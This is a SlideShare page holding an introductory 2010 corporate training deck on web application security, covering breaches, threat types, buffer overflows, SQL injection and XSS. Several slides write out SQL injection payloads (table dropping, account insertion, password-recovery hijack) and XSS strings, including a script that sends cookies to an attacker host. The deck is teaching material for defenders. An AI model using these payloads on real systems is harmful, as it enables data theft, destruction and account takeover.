Soumettre la recherche
Mettre en ligne
Web application security
•
Télécharger en tant que PPT, PDF
•
1 j'aime
•
826 vues
Sathyanarayana Panduranga
Suivre
Technologie
Signaler
Partager
Signaler
Partager
1 sur 44
Télécharger maintenant
Recommandé
A Survey Paper on Identity Theft in the Internet
A Survey Paper on Identity Theft in the Internet
ijtsrd
Hacking and Cyber Security.
Hacking and Cyber Security.
Kalpesh Doru
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
IOSR Journals
Web phish detection (an evolutionary approach)
Web phish detection (an evolutionary approach)
eSAT Journals
Web phish detection (an evolutionary approach)
Web phish detection (an evolutionary approach)
eSAT Publishing House
Phishing attack types and mitigation strategies
Phishing attack types and mitigation strategies
Sarim Khawaja
The (in)security of File Hosting Services
The (in)security of File Hosting Services
Marco Balduzzi
TH3 Professional Developper google hacking
TH3 Professional Developper google hacking
th3prodevelopper
Recommandé
A Survey Paper on Identity Theft in the Internet
A Survey Paper on Identity Theft in the Internet
ijtsrd
Hacking and Cyber Security.
Hacking and Cyber Security.
Kalpesh Doru
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
IOSR Journals
Web phish detection (an evolutionary approach)
Web phish detection (an evolutionary approach)
eSAT Journals
Web phish detection (an evolutionary approach)
Web phish detection (an evolutionary approach)
eSAT Publishing House
Phishing attack types and mitigation strategies
Phishing attack types and mitigation strategies
Sarim Khawaja
The (in)security of File Hosting Services
The (in)security of File Hosting Services
Marco Balduzzi
TH3 Professional Developper google hacking
TH3 Professional Developper google hacking
th3prodevelopper
Bh4101338342
Bh4101338342
IJERA Editor
CSC103 Digital Security
CSC103 Digital Security
Richard Homa
tatget attack
tatget attack
Imrana Yari
Aa4502172179
Aa4502172179
IJERA Editor
A novel way of integrating voice recognition and one time passwords to preven...
A novel way of integrating voice recognition and one time passwords to preven...
ijdpsjournal
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
Jeremiah Grossman
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing Tools
IRJET Journal
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
REVULN
Hacking3e ppt ch09
Hacking3e ppt ch09
Skillspire LLC
Footprinting
Footprinting
Ali Asghar Jafari Lari
Evolution Of Web Security
Evolution Of Web Security
Chris Shiflett
Cscu module 04 data encryption
Cscu module 04 data encryption
Sejahtera Affif
Rise of cyber security v0.1
Rise of cyber security v0.1
Sohail Gohir
Alpha Tech Module7 8 glossary
Alpha Tech Module7 8 glossary
thinkict
Lets Make our Web Applications Secure
Lets Make our Web Applications Secure
Aryashree Pritikrishna
Identifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
n|u - The Open Security Community
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
Oles Seheda
Security News Byes- Nov
Security News Byes- Nov
prashsiv
Hacking3e ppt ch06
Hacking3e ppt ch06
Skillspire LLC
Scaling web systems ts
Scaling web systems ts
Sathyanarayana Panduranga
Software as a Service
Software as a Service
Sathyanarayana Panduranga
Dollarbird inc
Dollarbird inc
guest4d4987
Contenu connexe
Tendances
Bh4101338342
Bh4101338342
IJERA Editor
CSC103 Digital Security
CSC103 Digital Security
Richard Homa
tatget attack
tatget attack
Imrana Yari
Aa4502172179
Aa4502172179
IJERA Editor
A novel way of integrating voice recognition and one time passwords to preven...
A novel way of integrating voice recognition and one time passwords to preven...
ijdpsjournal
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
Jeremiah Grossman
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing Tools
IRJET Journal
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
REVULN
Hacking3e ppt ch09
Hacking3e ppt ch09
Skillspire LLC
Footprinting
Footprinting
Ali Asghar Jafari Lari
Evolution Of Web Security
Evolution Of Web Security
Chris Shiflett
Cscu module 04 data encryption
Cscu module 04 data encryption
Sejahtera Affif
Rise of cyber security v0.1
Rise of cyber security v0.1
Sohail Gohir
Alpha Tech Module7 8 glossary
Alpha Tech Module7 8 glossary
thinkict
Lets Make our Web Applications Secure
Lets Make our Web Applications Secure
Aryashree Pritikrishna
Identifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
n|u - The Open Security Community
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
Oles Seheda
Security News Byes- Nov
Security News Byes- Nov
prashsiv
Hacking3e ppt ch06
Hacking3e ppt ch06
Skillspire LLC
Tendances
(19)
Bh4101338342
Bh4101338342
CSC103 Digital Security
CSC103 Digital Security
tatget attack
tatget attack
Aa4502172179
Aa4502172179
A novel way of integrating voice recognition and one time passwords to preven...
A novel way of integrating voice recognition and one time passwords to preven...
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing Tools
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
Hacking3e ppt ch09
Hacking3e ppt ch09
Footprinting
Footprinting
Evolution Of Web Security
Evolution Of Web Security
Cscu module 04 data encryption
Cscu module 04 data encryption
Rise of cyber security v0.1
Rise of cyber security v0.1
Alpha Tech Module7 8 glossary
Alpha Tech Module7 8 glossary
Lets Make our Web Applications Secure
Lets Make our Web Applications Secure
Identifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
Security News Byes- Nov
Security News Byes- Nov
Hacking3e ppt ch06
Hacking3e ppt ch06
En vedette
Scaling web systems ts
Scaling web systems ts
Sathyanarayana Panduranga
Software as a Service
Software as a Service
Sathyanarayana Panduranga
Dollarbird inc
Dollarbird inc
guest4d4987
GE1 important information -on satpanth and samaj d
GE1 important information -on satpanth and samaj d
Satpanth Dharm
My strategicplan.strategyhuddle.042810
My strategicplan.strategyhuddle.042810
M3Planning
Czwartek Social Media Katowice - Świat poza Facebookiem
Czwartek Social Media Katowice - Świat poza Facebookiem
Wojciech
PurpleSearch screenshots
PurpleSearch screenshots
Try PurpleSearch
OE12A -ABKKPS -membership forms -with email -d
OE12A -ABKKPS -membership forms -with email -d
Satpanth Dharm
Series 9 attachment -photos of original hindu atharv ved pages
Series 9 attachment -photos of original hindu atharv ved pages
Satpanth Dharm
Abecedario para niños
Abecedario para niños
informaticadealumnos
Mattyb
Mattyb
guest3e69ed
Series 24 - persons and reasons behind embracing laxminarayan sect
Series 24 - persons and reasons behind embracing laxminarayan sect
Satpanth Dharm
Series 5 pirana pooja vidhi and gyan -d
Series 5 pirana pooja vidhi and gyan -d
Satpanth Dharm
An Analysis of Emerging Markets". = Honors Thesis
An Analysis of Emerging Markets". = Honors Thesis
dre101
Test doubles and EasyMock
Test doubles and EasyMock
Rafael Antonio Gutiérrez Turullols
Series 26 - chains of pirana -a short article about changes in pirana -de
Series 26 - chains of pirana -a short article about changes in pirana -de
Satpanth Dharm
Copied quizzing
Copied quizzing
Venkatraman Ananthanarayanan
Customer service
Customer service
15778
March 2010 Issue 3
March 2010 Issue 3
Leeds Met India
Gen peace lite conflict responses & peace initiatives
Gen peace lite conflict responses & peace initiatives
GenPeace
En vedette
(20)
Scaling web systems ts
Scaling web systems ts
Software as a Service
Software as a Service
Dollarbird inc
Dollarbird inc
GE1 important information -on satpanth and samaj d
GE1 important information -on satpanth and samaj d
My strategicplan.strategyhuddle.042810
My strategicplan.strategyhuddle.042810
Czwartek Social Media Katowice - Świat poza Facebookiem
Czwartek Social Media Katowice - Świat poza Facebookiem
PurpleSearch screenshots
PurpleSearch screenshots
OE12A -ABKKPS -membership forms -with email -d
OE12A -ABKKPS -membership forms -with email -d
Series 9 attachment -photos of original hindu atharv ved pages
Series 9 attachment -photos of original hindu atharv ved pages
Abecedario para niños
Abecedario para niños
Mattyb
Mattyb
Series 24 - persons and reasons behind embracing laxminarayan sect
Series 24 - persons and reasons behind embracing laxminarayan sect
Series 5 pirana pooja vidhi and gyan -d
Series 5 pirana pooja vidhi and gyan -d
An Analysis of Emerging Markets". = Honors Thesis
An Analysis of Emerging Markets". = Honors Thesis
Test doubles and EasyMock
Test doubles and EasyMock
Series 26 - chains of pirana -a short article about changes in pirana -de
Series 26 - chains of pirana -a short article about changes in pirana -de
Copied quizzing
Copied quizzing
Customer service
Customer service
March 2010 Issue 3
March 2010 Issue 3
Gen peace lite conflict responses & peace initiatives
Gen peace lite conflict responses & peace initiatives
Similaire à Web application security
Hacking and its Defence
Hacking and its Defence
Greater Noida Institute Of Technology
Information security
Information security
Sathyanarayana Panduranga
You think you are safe online. Are You?
You think you are safe online. Are You?
TechGenie
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
Cenzic
Introduction to Web Server Security
Introduction to Web Server Security
JITENDRA KUMAR PATEL
GDG Dev Fest 2014 Cyber Security & Bangladesh (Raffiqunnabi Rumman )
GDG Dev Fest 2014 Cyber Security & Bangladesh (Raffiqunnabi Rumman )
Md Raffiqunnabi Rumman
3rd Party Cyber Security: Manage your ecosystem!
3rd Party Cyber Security: Manage your ecosystem!
NormShield, Inc.
Web Application Security with PHP
Web Application Security with PHP
jikbal
Operating Systems: Computer Security
Operating Systems: Computer Security
Damian T. Gordon
Operating Systems: Computer Security
Operating Systems: Computer Security
Damian T. Gordon
What Makes Web Applications Desirable For Hackers
What Makes Web Applications Desirable For Hackers
Jaime Manteiga
Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdf
arri2009av
Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007
Vaibhav Gupta
Hackers
Hackers
Alvaro Cipriano
Hackers
Hackers
yozusaki
Hackers
Hackers
guesta04f59b
Volume And Vectors 090416
Volume And Vectors 090416
Anthony Arrott
IBPS SO
IBPS SO
Jitendra kadu
Security Threats to Electronic Commerce
Security Threats to Electronic Commerce
Darlene Enderez
Steve Kosten - Exploiting common web application vulnerabilities
Steve Kosten - Exploiting common web application vulnerabilities
Trish McGinity, CCSK
Similaire à Web application security
(20)
Hacking and its Defence
Hacking and its Defence
Information security
Information security
You think you are safe online. Are You?
You think you are safe online. Are You?
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
Introduction to Web Server Security
Introduction to Web Server Security
GDG Dev Fest 2014 Cyber Security & Bangladesh (Raffiqunnabi Rumman )
GDG Dev Fest 2014 Cyber Security & Bangladesh (Raffiqunnabi Rumman )
3rd Party Cyber Security: Manage your ecosystem!
3rd Party Cyber Security: Manage your ecosystem!
Web Application Security with PHP
Web Application Security with PHP
Operating Systems: Computer Security
Operating Systems: Computer Security
Operating Systems: Computer Security
Operating Systems: Computer Security
What Makes Web Applications Desirable For Hackers
What Makes Web Applications Desirable For Hackers
Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdf
Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007
Hackers
Hackers
Hackers
Hackers
Hackers
Hackers
Volume And Vectors 090416
Volume And Vectors 090416
IBPS SO
IBPS SO
Security Threats to Electronic Commerce
Security Threats to Electronic Commerce
Steve Kosten - Exploiting common web application vulnerabilities
Steve Kosten - Exploiting common web application vulnerabilities
Dernier
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
Commit University
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
LoriGlavin3
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
Kalema Edgar
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
MounikaPolabathina
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
Raghuram Pandurangan
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
Lonnie McRorey
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
Lorenzo Miniero
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
Dubai Multi Commodity Centre
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
Slibray Presentation
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
Rizwan Syed
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
Florian Wilhelm
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
Fwdays
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
mohitsingh558521
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
BkGupta21
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
Alan Dix
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
Curtis Poe
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
Fwdays
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
LoriGlavin3
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
NavinnSomaal
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
Sergiu Bodiu
Dernier
(20)
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
Web application security
1.
Web Application Security An
Introduction Sathya Narayana Panduranga © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
2.
Nimda outbreak spreads
worldwide (September 18, 2001) The worm spread by emailing itself as an attachment, scanning for--and then infecting--vulnerable Web servers running Microsoft's Internet Information Server software, Copying itself to shared disk drives on networks, and Appending Javascript code to Web pages that will download the worm to Web surfers' PCs when they view the page. Caused $530 million worth damages with in just first week of outbreak © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
3.
CardSystems debacle (June,
2005) In June 2005, information on a million credit cards were stolen from CardSystems through SQL Injection Enquiry revealed that this company was keeping an unencrypted log of all (40 million) Credit Cards processed The company was liquidated © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
4.
Denial of Service
Attack Takes Down Amazon, Wal-Mart (June, 2008) Amazon.com was taken down for several hours by a distributed denial-of-service attack that struck the Web site's load-balancing system © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
5.
ChoicePoint to Pay
$15 million fine for Data Breach (Sept, 2010) The April 2008 breach compromised the personal data of 13,750 people. For a 30-day period, an unknown hacker conducted thousands of unauthorized searches of a ChoicePoint database containing sensitive consumer information, including Social Security numbers © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
6.
Understanding Threats Defacement Infiltration Phishing Pharming Insider Threats Denial
of Service Data theft / loss © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
7.
Defacement Online Vandalism,
attackers replace legitimate pages with illegitimate ones Targeted towards political web sites Risk of public misinformation and potential liabilities White House website defaced by Anti-NATO Activists © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
8.
Infiltration Unauthorized parties gain
access to resources of your computer system (e.g. CPUs, disk, network bandwidth) Could gain read/write access to back-end DB Data integrity and confidentiality at Risk © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
9.
Phishing Attacker sets up
spoofed site that looks real Lures users to enter login credentials and stores them Usually sent through an e-mail with link to spoofed site asking users to “verify” their account info The links might be disguised through the click texts Disguising Evil Link © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
10.
Phishing Email Phishing Website ©
2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
11.
Pharming (DNS Cache
Poisoning) Like phishing, attacker’s goal is to get user to enter sensitive data into spoofed website The attacker targets the DNS service used by the customer. Attacker makes DNS translate legitimate URL to their IP address instead and the result gets cached, poisoning future replies as well User wants to go the website ‘www.nicebank.com’ and types the address in the web browser. User’s computer queries the DNS server for the IP address of ‘www.nicebank.com’. Since the DNS server has already been ‘poisoned’ by the attacker, it returns the IP address of the fake website to the user’s computer. © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
12.
© 2010 Ariba,
Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
13.
How Pharming is
done Etc/hosts file manipulation DNS Cache poisoning (using vulnerabilities in DNS query protocol, specific DNS server) Domain Hijacking Taking advantage of user typo errors © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
14.
Insider Threats Attacks carried
out with cooperation of insiders Insiders could have access to data and leak it DB and Sys Admins usually get complete access Threats Malware being bundled with legitimate software Loss of confidentiality and Data © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
15.
Denial of Service Attacker
inundates server with packets causing it to drop legitimate packets Makes service unavailable, downtime = lost revenue Particularly a threat for financial and ecommerce vendors Can be automated through Botnets (DDos) © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
16.
Data Theft or
Data Loss Several Examples: BofA, ChoicePoint, VA BofA: backup data tapes lost in transit ChoicePoint: fraudsters queried DB for sensitive info (SQL Injection) VA: employee took computer with personal info home & his home was burglarized Can lead to Identity theft (resulting in liability to the company) © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
17.
Means SQL Injection
JavaScript Injection Worms Botnets Malware Rootkits Keyloggers Trojans Adware Clickbots Cross Site Scripting (XSS) Cookie Stealing Dictionary attack © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
18.
Buffer Overflows • Buffer
overflow attack is a way to inject malicious code into a running program • This way attacker takes control of the program © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
19.
1 int checkPassword()
{ 2 char pass[16]; 3 bzero(pass, 16); // Initialize 4 printf ("Enter password: "); 5 gets(pass); 6 if (strcmp(pass, "opensesame") == 0) 7 return 1; 8 else 9 return 0; 10 } 11 12 void openVault() { 13 // Opens the vault 14 } 15 16 main() { 17 if (checkPassword()) { 18 openVault(); 19 printf ("Vault opened!"); 20 } 21 } © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
20.
Execution stack: maintains
current function state and address of return function Stack frame: holds vars and data for function Extra user input (> 16 chars) overwrites return address Attack string: 17-20th chars can specify address of openVault() to bypass check Address can be found with source code or binary Return-into-libc attack: jump to library functions e.g. /bin/sh or cmd.exe to gain access to a command shell (shellcode) and complete control © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
21.
Considerations One of the
oldest and most common forms of security threats Affects both stacks and heaps Originally used by Nimda and Morris worms Doesn’t affect Java/J2EE systems unless the Native code used by these systems is vulnerable Targeted Vulnerability Program not employing careful bounds checking of input parameters © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
22.
Worms and other
Malware Worms spread across Internet through vulnerabilities in widely used software applications History First Worm: Morris Worm (1988) Code Red (2001) Nimda (2001) Blaster (2003) SQL Slammer (2003) Root-kits, Botnets, Spyware, other Malware © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
23.
Worm vs Virus
Virus: program that copies itself into other programs Could be transferred through infected disks Rate dependent on human use Worm: a virus that uses the network to copy itself onto other computers Worms propagate faster than viruses Large # of computers to infect Connecting is fast (milliseconds) © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
24.
Anatomy of the
attack Morris Worm Didn’t touch data but spiked NW traffic by propagating (copying self) Exploited Buffer Overflow in fingerd (Unix), vulnerability in sendmail debug mode used a dictionary of 432 frequently used passwords to login and execute rexec and rsh Code Red Worm Spread rapidly across the internet and defaced the homepage of infected servers Resident only in memory, no disk writes Exploited MS IIS server buffer overflow vulnerability Exploited “indexing server” feature by scanning for IP addresses to connect to other IIS servers © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
25.
Anatomy of the
attack…continued Nimda Worm Worse form of Code Red worm Used multiple propagation vectors: Server to server, server to client The infected client sent Emails with Nimda as payload Blaster Worm The infected machine would lauch a DDos attack on Windows update site and then shut down the machine The DDos attack prevented users from downloading the patch (fix) Exploited Buffer Overflow vulnerability in Windows DCOM service © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
26.
Other Malware Rootkits:
imposter OS tools used by attacker to hide his tracks Botnets: network of software robots attacker uses to control many machines at once to launch attacks (e.g. DDoS through packet flooding, click fraud) Spyware: software that monitors activity of a system or its users without their consent Keyloggers: spyware that monitors user keyboard or mouse input, used to steal usernames, passwords, credit card #s, etc… Trojan Horses: software performs additional or different functions than advertised Adware: shows ads to users w/o their consent © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
27.
Targeted Vulnerabilities Organization not
having / implementing good security policies Program not handling buffer overflow vulnerability Program relying on unknown 3rd party component (which may be vulnerable) Keeping all the features turned on by default No clear password policy (users having predictable passwords) © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
28.
Client state manipulation:
Record, manipulate and replay attack HTTP is stateless: server may send state info to the client which echoes it back in future requests When client state is stored un-encrypted for example in Hidden form fields it can be manipulated by an attacker Unix curl and wget commands can be used for record-replay attack Server based session management with strong session ids can mitigate the problem © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
29.
Client State Manipulation:
JavaScript Manipulation Evil user can just delete JavaScript code, substitute desired parameters & submit! Could also just submit request & bypass JavaScript Warning: Data validation or computations done by JavaScript cannot be trusted by server Attacker may alter script in HTML code to modify computations Attacker may use Javascript code to gain additional intelligence about the application Must be redone on server to verify © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
30.
Targeted Vulnerabilities Program not
sanitizing input Not expiring sessions Writing sensitive information to cookies Storing client-state un-encrypted Not recognizing brute-force attacks Unobfuscated JavaScript code © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
31.
SQL Injection SQL
injection attacks are important security threat that can Compromise sensitive user data Alter or damage critical data Give an attacker unwanted access to DB © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
32.
Attacker guesses
the SQL used in the backend SELECT full_name, phone_number, ssn FROM userinfo WHERE email = $EMAIL; Let us say the attacker knows a valid email id ‘bob@example.com’. He tries to find out if the application has a SQL injection vulnerability by SELECT userid FROM userinfo WHERE email = ‘bob@example.com''; The error message is sure shot giveaway to the SQL injection vulnerability Inject an SQL to return every row in the table SELECT userid FROM userinfo WHERE email = 'anything' OR 'x'='x'; The clause is guaranteed to be true © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
33.
Attacker wants
to find out the field names SELECT fieldlist FROM table WHERE field = 'x' AND email IS NULL; --'; If he gets a server error, it means our SQL is malformed and a syntax error was thrown: it's most likely due to a bad field name. If he gets any kind of valid response, he guessed the name correctly. Finding the table name SELECT email, passwd, login_id, full_name FROM userinfo WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --'; If he gets any kind of valid response, he guessed the name correctly. If the password is stored in clear text: bruteforce break in SELECT email, passwd, login_id, full_name FROM userinfo WHERE email = 'bob@example.com' AND passwd = ‘hello123'; Tries multiple times with different common passwords until he breaks in © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
34.
If the
DB is not read-only SELECT email, passwd, login_id, full_name FROM userinfo WHERE email = 'x'; DROP TABLE userinfo; --'; Adding a malicious user SELECT email, passwd, login_id, full_name FROM userinfo WHERE email = 'x'; INSERT INTO userinfo ('email','passwd','login_id','full_name') VALUES ('evil@example.com','hello','evil','Evil User');--'; Malicious password recovery SELECT email, passwd, login_id, full_name FROM userinfo WHERE email = 'x'; UPDATE userinfo SET email = 'steve@example1.com' WHERE email = 'bob@example.com'; Lets say the application provides a “I lost my password” link which emails password and lets say the attacker clicks on it ----------------------------------------------------From: system@example.com To: steve@example1.com Subject: Intranet login This email is in response to your request for your Intranet log in information. Your User ID is: bob Your password is: hello -------------------------------------------------© 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
35.
Targeted Vulnerabilities Program not
sanitizing inputs Program not using appropriate privilege levels for accessing database Program not validating the input source Storing clear text passwords Having guessable table and field names © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
36.
Cross Site Scripting
(XSS) Attacks Security issues arising from browser interacting with multiple web apps (ours and malicious ones), not direct attacks Cross-Site Request Forgery (XSRF) Cross-Site Script Inclusion (XSSI) Cross-Site Scripting (XSS) © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
37.
Following jsp
code reads employee code from HTTP request and displays to the user <% String eid = request.getParameter("eid"); %> ... Employee ID: <%= eid %> This code is vulnerable to Javascript injection and thus vulnerable to XSS Try injecting the following script to vulnerable website <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> The above vulnerability is called non-persistent XSS vulnerability <% ... rs = stmt.executeQuery("select * from emp where id="+eid); … String name = rs.getString("name"); %> Employee Name: <%= name %> The above code has persistent XSS vulnerability © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
38.
Cookie grabbing Execute
the following code on vulnerable website <IMG """><SCRIPT>alert(document.cookie)</SCRIPT>"> Various ways of injecting javascript <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
39.
XSS Attacker can get
a malicious script to be executed in our application’s context Malicious script could cause browser to send attacker all cookies for our app’s domain <script> i = new Image(); i.src = "http://www.hackerhome.org/log_cookie?cookie=" + escape(document.cookie); // URL-encode </script> Above Script injected to execute in our domain Can access document.cookie in DOM Constructs URL on attacker’s server, gets saved in a log file, can extract info from cookie parameter © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
40.
Sources of untrusted
data Query parameters, HTML form fields Path of the URI which could be inserted into page via a “Document not found” error Cookies, parts of the HTTP request header (e.g. Referer header) Data inserted into a SQL DB, file system 3rd party data (e.g. RSS feed) © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
41.
Securing the Enterprise Physical
